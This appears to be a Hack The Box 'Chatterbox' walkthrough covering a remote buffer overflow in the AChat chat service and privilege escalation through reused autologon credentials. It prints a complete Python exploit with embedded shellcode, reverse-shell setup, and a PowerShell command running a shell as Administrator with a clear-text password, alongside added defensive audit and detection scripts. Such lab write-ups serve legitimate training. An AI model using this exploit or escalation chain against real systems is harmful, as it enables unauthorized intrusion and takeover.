
Hack The Box – Chatterbox Walkthrough

Introduction

This was an easy Windows box. Initial access came from exploiting a remote buffer overflow in the AChat application running on the Chatterbox host, and privilege escalation came from cached autologon credentials, which were reused to execute a reverse shell as the Administrator user.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests

The next thing to do will be to enumerate the AChat service on port 9255/9256.

Enumerating AChat

AChat is an application that enables you to chat on your local network (LAN). Using the SearchSploit tool to identify any known vulnerabilities in AChat:

It appears that AChat is affected by a remote buffer overflow vulnerability. Mirroring (copying) the exploit into the working directory:

For this exploit to run, all that is required is shellcode generated with MSFvenom and inserted into the Python script.

Exploiting AChat Buffer Overflow

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -a to specify the architecture, in this case, x86
  • -p to specify the payload type, in this case, the Windows TCP Reverse Shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -e to specify the encoder, in this case, unicode_mixed
  • -b to specify the bad characters, in this case, simply using the ones provided in the exploit

Inserting the generated shellcode in the Python script:

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x67\x78\x64\x42"
buf += b"\x59\x70\x4b\x50\x6d\x30\x61\x50\x32\x69\x69\x55\x30"
buf += b"\x31\x75\x70\x61\x54\x54\x4b\x30\x50\x50\x30\x52\x6b"
buf += b"\x62\x32\x4a\x6c\x64\x4b\x52\x32\x5a\x74\x64\x4b\x61"
buf += b"\x62\x4c\x68\x7a\x6f\x54\x77\x6e\x6a\x4f\x36\x6d\x61"
buf += b"\x6b\x4f\x54\x6c\x4d\x6c\x53\x31\x61\x6c\x7a\x62\x6e"
buf += b"\x4c\x4f\x30\x55\x71\x36\x6f\x5a\x6d\x59\x71\x37\x57"
buf += b"\x59\x52\x4c\x32\x62\x32\x70\x57\x34\x4b\x50\x52\x7a"
buf += b"\x70\x32\x6b\x4f\x5a\x4d\x6c\x64\x4b\x50\x4c\x6e\x31"
buf += b"\x31\x68\x6a\x43\x50\x48\x69\x71\x7a\x31\x42\x31\x74"
buf += b"\x4b\x61\x49\x6b\x70\x39\x71\x6a\x33\x54\x4b\x70\x49"
buf += b"\x7a\x78\x6a\x43\x6e\x5a\x4f\x59\x74\x4b\x4e\x54\x72"
buf += b"\x6b\x6b\x51\x67\x66\x6e\x51\x69\x6f\x56\x4c\x79\x31"
buf += b"\x56\x6f\x6a\x6d\x79\x71\x59\x37\x4c\x78\x49\x50\x62"
buf += b"\x55\x58\x76\x79\x73\x43\x4d\x6c\x38\x4d\x6b\x73\x4d"
buf += b"\x4f\x34\x61\x65\x49\x54\x6e\x78\x34\x4b\x4f\x68\x4d"
buf += b"\x54\x69\x71\x59\x43\x50\x66\x42\x6b\x4a\x6c\x6e\x6b"
buf += b"\x62\x6b\x31\x48\x6d\x4c\x6d\x31\x46\x73\x54\x4b\x6d"
buf += b"\x34\x32\x6b\x7a\x61\x66\x70\x42\x69\x6f\x54\x4d\x54"
buf += b"\x6c\x64\x31\x4b\x61\x4b\x70\x61\x61\x49\x51\x4a\x6e"
buf += b"\x71\x79\x6f\x37\x70\x61\x4f\x6f\x6f\x6f\x6a\x64\x4b"
buf += b"\x6c\x52\x48\x6b\x74\x4d\x61\x4d\x52\x48\x50\x33\x50"
buf += b"\x32\x49\x70\x4d\x30\x30\x68\x63\x47\x64\x33\x50\x32"
buf += b"\x51\x4f\x30\x54\x31\x58\x4e\x6c\x31\x67\x4c\x66\x6c"
buf += b"\x47\x39\x6f\x66\x75\x54\x78\x42\x70\x4d\x31\x79\x70"
buf += b"\x4d\x30\x6b\x79\x56\x64\x72\x34\x62\x30\x62\x48\x4d"
buf += b"\x59\x43\x50\x42\x4b\x6b\x50\x39\x6f\x78\x55\x62\x30"
buf += b"\x70\x50\x32\x30\x30\x50\x71\x30\x52\x30\x61\x30\x6e"
buf += b"\x70\x51\x58\x4a\x4a\x4c\x4f\x37\x6f\x39\x50\x4b\x4f"
buf += b"\x79\x45\x73\x67\x61\x5a\x6a\x65\x53\x38\x4c\x4a\x7a"
buf += b"\x6a\x4a\x6e\x59\x72\x42\x48\x69\x72\x69\x70\x4d\x31"
buf += b"\x37\x4b\x32\x69\x79\x56\x30\x6a\x4a\x70\x51\x46\x52"
buf += b"\x37\x61\x58\x54\x59\x43\x75\x52\x54\x61\x51\x39\x6f"
buf += b"\x68\x55\x33\x55\x59\x30\x30\x74\x4a\x6c\x39\x6f\x30"
buf += b"\x4e\x49\x78\x32\x55\x38\x6c\x71\x58\x7a\x50\x58\x35"
buf += b"\x67\x32\x30\x56\x79\x6f\x37\x65\x6f\x78\x63\x33\x62"
buf += b"\x4d\x52\x44\x69\x70\x75\x39\x47\x73\x4e\x77\x4e\x77"
buf += b"\x42\x37\x6e\x51\x6b\x46\x32\x4a\x6c\x52\x50\x59\x71"
buf += b"\x46\x67\x72\x4b\x4d\x73\x36\x59\x37\x6e\x64\x4c\x64"
buf += b"\x6f\x4c\x4a\x61\x79\x71\x34\x4d\x71\x34\x4f\x34\x4a"
buf += b"\x70\x45\x76\x79\x70\x6e\x64\x50\x54\x70\x50\x4e\x76"
buf += b"\x30\x56\x62\x36\x51\x36\x6e\x76\x30\x4e\x31\x46\x51"
buf += b"\x46\x6e\x73\x72\x36\x53\x38\x54\x39\x58\x4c\x4d\x6f"
buf += b"\x75\x36\x39\x6f\x67\x65\x35\x39\x37\x70\x50\x4e\x6f"
buf += b"\x66\x6d\x76\x4b\x4f\x6c\x70\x53\x38\x5a\x68\x51\x77"
buf += b"\x4b\x6d\x4f\x70\x79\x6f\x7a\x35\x75\x6b\x58\x70\x54"
buf += b"\x75\x34\x62\x4f\x66\x72\x48\x75\x56\x36\x35\x57\x4d"
buf += b"\x53\x6d\x6b\x4f\x78\x55\x6f\x4c\x4c\x46\x73\x4c\x6c"
buf += b"\x4a\x31\x70\x69\x6b\x57\x70\x51\x65\x59\x75\x35\x6b"
buf += b"\x71\x37\x4c\x53\x54\x32\x42\x4f\x70\x6a\x79\x70\x6e"
buf += b"\x73\x6b\x4f\x68\x55\x41\x41"
# Create a UDP socket towards the AChat service (port 9256/UDP)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
# Send the buffer in 8192-byte datagrams (Python 2 script, as published)
i = 0
while i < len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Running the exploit:

A callback on the Netcat listener was received, granting a reverse shell as the Alfred user.

Privilege Escalation

Using the Certutil utility and the Python simple web server to transfer the WinPEAS script to the victim machine:

Running the WinPEAS enumeration script:

It appears that autologon credentials for the Alfred user are stored on the machine; the same credentials could possibly have been reused for the Administrator user:
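The autologon credentials WinPEAS reports come from the Winlogon registry key, which is readable by any local user. The following PowerShell function is an added example, not part of the original walkthrough or of WinPEAS: it audits that key the way a defender would, reporting whether a clear-text DefaultPassword is present without ever printing it, and offers a remediation function that removes the value. The key path and value names (AutoAdminLogon, DefaultUserName, DefaultDomainName, DefaultPassword) are the standard Winlogon values; the function names are my own.

```powershell
# Added example (not from the walkthrough): audit the Winlogon autologon values
# that tools such as WinPEAS read, and optionally remove the clear-text password.
function Get-AutologonExposure {
    [CmdletBinding()]
    param(
        # Standard Winlogon key holding AutoAdminLogon/DefaultUserName/DefaultPassword
        [string]$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    )

    $wl = Get-ItemProperty -Path $WinlogonPath -ErrorAction Stop

    $enabled              = ($wl.AutoAdminLogon -eq '1')
    $hasClearTextPassword = -not [string]::IsNullOrEmpty($wl.DefaultPassword)

    $risk = if ($enabled -and $hasClearTextPassword) {
                'HIGH: autologon enabled and password readable by every local user'
            } elseif ($hasClearTextPassword) {
                'MEDIUM: autologon disabled but a stale DefaultPassword remains'
            } else {
                'none'
            }

    [pscustomobject]@{
        AutoAdminLogon    = $enabled
        DefaultUserName   = $wl.DefaultUserName
        DefaultDomainName = $wl.DefaultDomainName
        # Report presence only; never echo the secret into a console or log
        ClearTextPassword = $hasClearTextPassword
        Risk              = $risk
    }
}

function Remove-AutologonPassword {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [string]$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    )

    # Requires an elevated session; -WhatIf shows the change without applying it
    if ($PSCmdlet.ShouldProcess($WinlogonPath, 'Remove DefaultPassword and disable AutoAdminLogon')) {
        Remove-ItemProperty -Path $WinlogonPath -Name 'DefaultPassword' -ErrorAction SilentlyContinue
        Set-ItemProperty    -Path $WinlogonPath -Name 'AutoAdminLogon' -Value '0'
    }
}

# Usage: run the audit first, then remediate only after reviewing the result
Get-AutologonExposure | Format-List
# Remove-AutologonPassword -WhatIf
```

Two points worth knowing when reading the result: a DefaultPassword value left behind after autologon was switched off is still a finding, because the key stays world-readable; and autologon configured with the Sysinternals Autologon tool keeps the password in an LSA secret rather than in this value, so an empty DefaultPassword does not by itself prove that no autologon credential exists on the host.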

Since there are no exposed services, such as RDP or WinRM, that would allow a remote connection to the box as the Administrator user, the credentials can instead be used from the existing shell through PowerShell's System.Management.Automation classes, which allow scripts or binaries to be executed as a different user. The clear-text password is supplied on the command line and converted into a SecureString for the PSCredential object at execution time.

Generating a reverse shell using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows TCP Reverse Shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

Using the Certutil utility and the Python simple web server to transfer the reverse shell to the victim machine:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

The following PowerShell command will execute the reverse shell as the Administrator user, if the credentials provided are correct:

powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password); Start-Process -FilePath 'shell.exe' -Credential $creds"

The command was executed successfully, confirming that the same credentials for Alfred were used for the Administrator user as well, and a callback on the Netcat listener was received, granting an administrative-level shell.
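Start-Process -Credential runs the binary through an explicit-credential logon, which Windows records in the Security log as event 4648 ("A logon was attempted using explicit credentials"), with the calling user as the subject and the account whose password was supplied as the target. The function below is an added detection example, not code from the walkthrough: it pulls recent 4648 events, reads the named fields from the event XML rather than relying on positional property indexes, and flags cases where one account launched a process as a different, watched account (Alfred running shell.exe as Administrator in this box). The function name, parameter defaults and the Administrator watch list are assumptions of the example.

```powershell
# Added example (not from the walkthrough): hunt for processes started with
# explicit credentials, which is what Start-Process -Credential produces.
function Get-ExplicitCredentialLogons {
    [CmdletBinding()]
    param(
        # How far back to look in the Security log
        [int]$Hours = 24,
        # Target accounts whose use via explicit credentials should be flagged
        [string[]]$WatchTargets = @('Administrator')
    )

    $filter = @{
        LogName   = 'Security'
        Id        = 4648
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    # Reading the Security log requires an elevated or Event Log Readers session
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Map EventData fields by name (SubjectUserName, TargetUserName, ProcessName, ...)
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) {
            $data[$d.Name] = $d.'#text'
        }

        [pscustomobject]@{
            Time       = $_.TimeCreated
            Subject    = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            Target     = "$($data.TargetDomainName)\$($data.TargetUserName)"
            Process    = $data.ProcessName
            # A low-privileged subject supplying credentials for a watched account
            # is the pattern used in this box's privilege escalation
            Suspicious = ($WatchTargets -contains $data.TargetUserName) -and
                         ($data.SubjectUserName -ne $data.TargetUserName)
        }
    } | Where-Object { $_.Suspicious }
}

# Usage: list flagged explicit-credential logons from the last day
Get-ExplicitCredentialLogons -Hours 24 | Format-Table -AutoSize
```

Correlate a hit with the 4624 logon event that follows it and, where PowerShell script block logging (event 4104) is enabled, with the logged command text: the ConvertTo-SecureString call in the command above lands in that log with the password in clear text, which makes the reuse visible but also means the log itself must be protected. The durable fix is the one the conclusion points at: unique passwords per account and no autologon secret readable by unprivileged users.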

Conclusion

Although the exploitation part of this challenge was quite trivial (it can be exploited manually as well, although at the time, since I had already done a ton of BOF practice for my OSCP, I didn't feel like doing so), the privilege escalation is quite interesting, as it shows how cached credentials can be very dangerous, especially when they are reused across multiple users.